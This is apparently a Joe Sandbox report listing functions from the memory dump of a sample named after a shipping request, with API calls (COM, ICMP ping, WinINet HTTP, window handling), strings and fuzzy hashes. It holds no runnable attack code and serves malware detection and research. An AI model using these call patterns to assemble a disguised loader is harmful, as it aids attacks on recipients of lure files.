
API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 9a7adb2bfa110eea065679aae985dc754c8bbcdac5e568063fc5feea510c96d3
Instruction ID: 14f3dc9f8e3d976f0fae7626e93e77cdbeb0fca9db3e9981767241cbdd95710f
Opcode Fuzzy Hash: 9a7adb2bfa110eea065679aae985dc754c8bbcdac5e568063fc5feea510c96d3
Instruction Fuzzy Hash: FD616CB5900348AFDB10EFA4CC81EEE77B9EF09714F14419AFA04A7291D774AD42DB64

Function 006B94E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 006B94FE
SafeArrayAllocData.OLEAUT32(?), ref: 006B9549
VariantInit.OLEAUT32(?), ref: 006B955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 006B957B
VariantCopy.OLEAUT32(?,?), ref: 006B95BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 006B95D2
VariantClear.OLEAUT32(?), ref: 006B95E7
SafeArrayDestroyData.OLEAUT32(?), ref: 006B95F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006B95FD
VariantClear.OLEAUT32(?), ref: 006B960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006B961A

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 73251a41f5959ad22822cd44ef4e862828c40bbe1b03eb8d2c04bb36c952782a
Instruction ID: 40feae9e0c5a381fdac12fbd3023b7371b0a0096dcb75eccaceacd26a9e477d5
Opcode Fuzzy Hash: 73251a41f5959ad22822cd44ef4e862828c40bbe1b03eb8d2c04bb36c952782a
Instruction Fuzzy Hash: A3415175900219EFCB11DFE4D8849DEBB7AFF08354F108069F901A3251DB75EA85CBA5

Function 006DBB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006DBB5C
VariantInit.OLEAUT32(?), ref: 006DBC2D
VariantInit.OLEAUT32(?), ref: 006DBD2E
VariantClear.OLEAUT32(?), ref: 006DBD38
VariantClear.OLEAUT32(?), ref: 006DBD99

Strings

|?s, xrefs: 006DBB34
Incorrect Object type in FOR..IN loop, xrefs: 006DBD11
h?s, xrefs: 006DBB2D
Null Object assignment in FOR..IN loop, xrefs: 006DBBBD, 006DBCEB, 006DBDA7

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?s$|?s
API String ID: 2862541840-909906569
Opcode ID: 010a24ffb378497d9d9611d36a2a829850d2e347f721fb0f070d7d17492dab56
Instruction ID: 5427f98b70f7e747915333421757937ee9f90272cd91257efd8f26b7abd443e4
Opcode Fuzzy Hash: 010a24ffb378497d9d9611d36a2a829850d2e347f721fb0f070d7d17492dab56
Instruction Fuzzy Hash: DD918971E00219EBDB209FA5C848FEEBBBAEF45710F11915AF505AB385DB709941CFA0

Function 006DADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 0068936C: __swprintf.LIBCMT ref: 006893AB
Part of subcall function 0068936C: __itow.LIBCMT ref: 006893DF

CoInitialize.OLE32 ref: 006DADF6
CoUninitialize.OLE32 ref: 006DAE01
CoCreateInstance.OLE32(?,00000000,00000017,0070D8FC,?), ref: 006DAE61
IIDFromString.OLE32(?,?), ref: 006DAED4
VariantInit.OLEAUT32(?), ref: 006DAF6E
VariantClear.OLEAUT32(?), ref: 006DAFCF

Strings

NULL Pointer assignment, xrefs: 006DAEA6
Invalid parameter, xrefs: 006DAEED
Failed to create object, xrefs: 006DAE6C, 006DAF22

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 2fbf350b333cc246722e9b7a619582d270c5a085a7030160adff84254181b563
Instruction ID: b5111ee14b38719f48ca7357e82008f91ab42a1cfd0844fb72d3a66d94303e91
Opcode Fuzzy Hash: 2fbf350b333cc246722e9b7a619582d270c5a085a7030160adff84254181b563
Instruction Fuzzy Hash: 93619B71A083019FD720EF94C848BAABBEAAF88714F04454EF9859B391C770ED45CB97

Function 006D8107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 006D8168
inet_addr.WSOCK32(?,?,?), ref: 006D81AD
gethostbyname.WSOCK32(?), ref: 006D81B9
IcmpCreateFile.IPHLPAPI ref: 006D81C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 006D8237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 006D824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 006D82C2
WSACleanup.WSOCK32 ref: 006D82C8

Strings

Ping, xrefs: 006D81EB

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 402259e9141a3eac0e896d7bcc5718413c3843728da749b15c12263ea8b2ba6c
Instruction ID: c10de2c17d463a81e261b791da8bc5d49bb4433a793347c23c06627142fbe045
Opcode Fuzzy Hash: 402259e9141a3eac0e896d7bcc5718413c3843728da749b15c12263ea8b2ba6c
Instruction Fuzzy Hash: D8518D31A04701AFD761AB64CC49B6AB7E6AF48320F04891AFA55973A1DF34E901CB85

Function 006CE389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 006CE396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 006CE40C
GetLastError.KERNEL32 ref: 006CE416
SetErrorMode.KERNEL32(00000000,READY), ref: 006CE483

Strings

NOTREADY, xrefs: 006CE442
UNKNOWN, xrefs: 006CE43B
READONLY, xrefs: 006CE44E
READY, xrefs: 006CE45C
INVALID, xrefs: 006CE455

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: e6601c8ddf77df88e88d8c8693adb63181178a89f54828813b3afb55c06d96b8
Instruction ID: 56a4e9086046ced21d5c83228c70105b618e44e87153a6e1509861aaa3bcd02b
Opcode Fuzzy Hash: e6601c8ddf77df88e88d8c8693adb63181178a89f54828813b3afb55c06d96b8
Instruction Fuzzy Hash: 20317E35A002099BDB15EFA8C849FBDB7F6EF14310F14C11EE505E7292DA759A02CB55

Function 006BB907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 006BB98C
GetDlgCtrlID.USER32 ref: 006BB997
GetParent.USER32 ref: 006BB9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 006BB9B6
GetDlgCtrlID.USER32(?), ref: 006BB9BF
GetParent.USER32(?), ref: 006BB9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 006BB9DE

Strings

ComboBox, xrefs: 006BB911
ListBox, xrefs: 006BB949

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: b21d4ce82c48b1d0e302f30eaf076bb574a510386a3916b37a799aa869787d9a
Instruction ID: b36aafae11d6598b928847aea0c14484edc735694f1bfc9632b56e68e489ee3d
Opcode Fuzzy Hash: b21d4ce82c48b1d0e302f30eaf076bb574a510386a3916b37a799aa869787d9a
Instruction Fuzzy Hash: 8721B6B5900204BFDB04BBA4CC85EFEB7B6EF46310F104219F551972D2DBB95856DB24

Function 006BB9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006BBA73
GetDlgCtrlID.USER32 ref: 006BBA7E
GetParent.USER32 ref: 006BBA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 006BBA9D
GetDlgCtrlID.USER32(?), ref: 006BBAA6
GetParent.USER32(?), ref: 006BBAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 006BBAC5

Strings

ComboBox, xrefs: 006BB9FA
ListBox, xrefs: 006BBA32

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 2e69a72f0daf72cd76607e08d7b6f3775cc96c311ce386ac96b68d82ae0e4417
Instruction ID: 922d6db7a1093e91723c01fa579014a28a7396768d73ac3f3cc18020a4f6a048
Opcode Fuzzy Hash: 2e69a72f0daf72cd76607e08d7b6f3775cc96c311ce386ac96b68d82ae0e4417
Instruction Fuzzy Hash: 952107B4900204BFDB10EFA4CC85EFEBBB6EF44300F004119F95197292DBB94856DB24

Function 006BBAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 006BBAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 006BBAF8
_wcscmp.LIBCMT ref: 006BBB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 006BBB85

Strings

details, xrefs: 006BBB33
list, xrefs: 006BBB67
largeicons, xrefs: 006BBB19
smallicons, xrefs: 006BBB4D
SHELLDLL_DefView, xrefs: 006BBB04

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: ef314ac456089ca0175c61e876ac8365caf8697cf7ae89af281dc861e26e6232
Instruction ID: a30da49813b79fa9765ba29ce77f37f7617bb1b7e7b7f615289c1e78eb0e35dd
Opcode Fuzzy Hash: ef314ac456089ca0175c61e876ac8365caf8697cf7ae89af281dc861e26e6232
Instruction Fuzzy Hash: D01106F6608307FEFA207620DC06DE6379E9B22760F204026FD04E50D7EFE66C924A18

Function 006DB2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006DB2D5
CoInitialize.OLE32(00000000), ref: 006DB302
CoUninitialize.OLE32 ref: 006DB30C
GetRunningObjectTable.OLE32(00000000,?), ref: 006DB40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 006DB539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 006DB56D
CoGetObject.OLE32(?,00000000,0070D91C,?), ref: 006DB590
SetErrorMode.KERNEL32(00000000), ref: 006DB5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 006DB623
VariantClear.OLEAUT32(0070D91C), ref: 006DB633

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 74fc09550534bd1b1cd89c309dcf1fdc70ac1314280ff097b07f1fdf7dc1c234
Instruction ID: 11df033d91283dccfc95471b84469acbb0415bf54e908a82d992edb97397072d
Opcode Fuzzy Hash: 74fc09550534bd1b1cd89c309dcf1fdc70ac1314280ff097b07f1fdf7dc1c234
Instruction Fuzzy Hash: 9CC114B1A08300EFC710DF65C88496AB7EABF88304F054A1EF58A9B351DB71ED06CB52

Function 006AACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 006AACC1

Part of subcall function 006A7CF4: __mtinitlocknum.LIBCMT ref: 006A7D06
Part of subcall function 006A7CF4: EnterCriticalSection.KERNEL32(00000000,?,006A7ADD,0000000D), ref: 006A7D1F

__calloc_crt.LIBCMT ref: 006AACD2

Part of subcall function 006A6986: __calloc_impl.LIBCMT ref: 006A6995
Part of subcall function 006A6986: Sleep.KERNEL32(00000000,000003BC,0069F507,?,0000000E), ref: 006A69AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 006AACED
GetStartupInfoW.KERNEL32(?,00736E28,00000064,006A5E91,00736C70,00000014), ref: 006AAD46
__calloc_crt.LIBCMT ref: 006AAD91
GetFileType.KERNEL32(00000001), ref: 006AADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 006AAE11

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: 259f33d666f8bfc1647a969149f41ed13fe9c23d54b2ec40ede1372f519db49f
Instruction ID: ba8d9a667c9c36cbbb99e4c6ef8bfbb57fcbfeb1ba3337d441ee43977ddcd2da
Opcode Fuzzy Hash: 259f33d666f8bfc1647a969149f41ed13fe9c23d54b2ec40ede1372f519db49f
Instruction Fuzzy Hash: 8B8171719053458FDB24EFA8C8405A9BBF2BF0A324B24825EE4A6AB3D1D7349C43DF55

Function 006FDD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0069B496
SetTextColor.GDI32(?,000000FF), ref: 0069B4A0
SetBkMode.GDI32(?,00000001), ref: 0069B4B5
GetStockObject.GDI32(00000005), ref: 0069B4BD
GetClientRect.USER32(?), ref: 006FDD63
SendMessageW.USER32(?,00001328,00000000,?), ref: 006FDD7A
GetWindowDC.USER32(?), ref: 006FDD86
GetPixel.GDI32(00000000,?,?), ref: 006FDD95
ReleaseDC.USER32(?,00000000), ref: 006FDDA7
GetSysColor.USER32(00000005), ref: 006FDDC5

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: 0c5488e13f0c6268a3d6e939a243baed8d0786dce44a2f6b8433409364dbd51c
Instruction ID: b9600c8ee64a37f2c4faa6ef71f96629492461d064fc9da1700936a5d25d0942
Opcode Fuzzy Hash: 0c5488e13f0c6268a3d6e939a243baed8d0786dce44a2f6b8433409364dbd51c
Instruction Fuzzy Hash: 76117931100309EFDB216BA4EC08BE97FA6EB04725F118321FA66951E2DF760D51EB24

Function 00683093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 006830DC
CoUninitialize.OLE32(?,00000000), ref: 00683181
UnregisterHotKey.USER32(?), ref: 006832A9
DestroyWindow.USER32(?), ref: 006F5079
FreeLibrary.KERNEL32(?), ref: 006F50F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 006F5125

Strings

close all, xrefs: 006830D7

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 821092de2ccf74debffe4f61098c068a2841984bafa495eeb8997b67194b9eeb
Instruction ID: 0401f432496a2f8d76b4bfb377af061d2f747cbe02056cee85dd53e959c44c2d
Opcode Fuzzy Hash: 821092de2ccf74debffe4f61098c068a2841984bafa495eeb8997b67194b9eeb
Instruction Fuzzy Hash: 7E912970200616CFC755EF24C895AA8F3A6FF14704F5582ADE50AA7362DF30AE56CF58

Function 0069CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0069CC15

Part of subcall function 0069CCCD: GetClientRect.USER32(?,?), ref: 0069CCF6
Part of subcall function 0069CCCD: GetWindowRect.USER32(?,?), ref: 0069CD37
Part of subcall function 0069CCCD: ScreenToClient.USER32(?,?), ref: 0069CD5F

GetDC.USER32 ref: 006FD137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 006FD14A
SelectObject.GDI32(00000000,00000000), ref: 006FD158
SelectObject.GDI32(00000000,00000000), ref: 006FD16D
ReleaseDC.USER32(?,00000000), ref: 006FD175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 006FD200

Strings

U, xrefs: 006FD0D5

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 6110376d8cfde19c383e1db779e082bec5fd21a1cd0d90e84ae21b821a66b020
Instruction ID: 16c5144a724ae484f155f957138043f65cf73281e5af7a244a3fa17b0d445b5d
Opcode Fuzzy Hash: 6110376d8cfde19c383e1db779e082bec5fd21a1cd0d90e84ae21b821a66b020
Instruction Fuzzy Hash: 7D71D034400209DFCF21DF64C881AFA3BB7FF49364F14426AEE555A2A6CB31AC42DB55

Function 006EECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0069B34E: GetWindowLongW.USER32(?,000000EB), ref: 0069B35F

Part of subcall function 0069B63C: GetCursorPos.USER32(000000FF), ref: 0069B64F
Part of subcall function 0069B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0069B66C
Part of subcall function 0069B63C: GetAsyncKeyState.USER32(00000001), ref: 0069B691
Part of subcall function 0069B63C: GetAsyncKeyState.USER32(00000002), ref: 0069B69F

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 006EED3C
ImageList_EndDrag.COMCTL32 ref: 006EED42
ReleaseCapture.USER32 ref: 006EED48
SetWindowTextW.USER32(?,00000000), ref: 006EEDF0
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 006EEE03
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 006EEEDC

Strings

@GUI_DRAGFILE, xrefs: 006EEE77
@GUI_DROPID, xrefs: 006EEE33

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: e0229106aee491a36f17cd7059ffccd995206b30d2b38fc57b0bd5ce6a6f9f58
Instruction ID: 697b2be863f73d5dbbfba712942b8af0aeeed4664937636e29200838f6e97c45
Opcode Fuzzy Hash: e0229106aee491a36f17cd7059ffccd995206b30d2b38fc57b0bd5ce6a6f9f58
Instruction Fuzzy Hash: 6E51BC74204300AFD710EF24CC46FAA77E6EB88314F408A1EF595972E1DB75A944CB66

Function 006D45C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006D45FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 006D462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 006D466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 006D4682
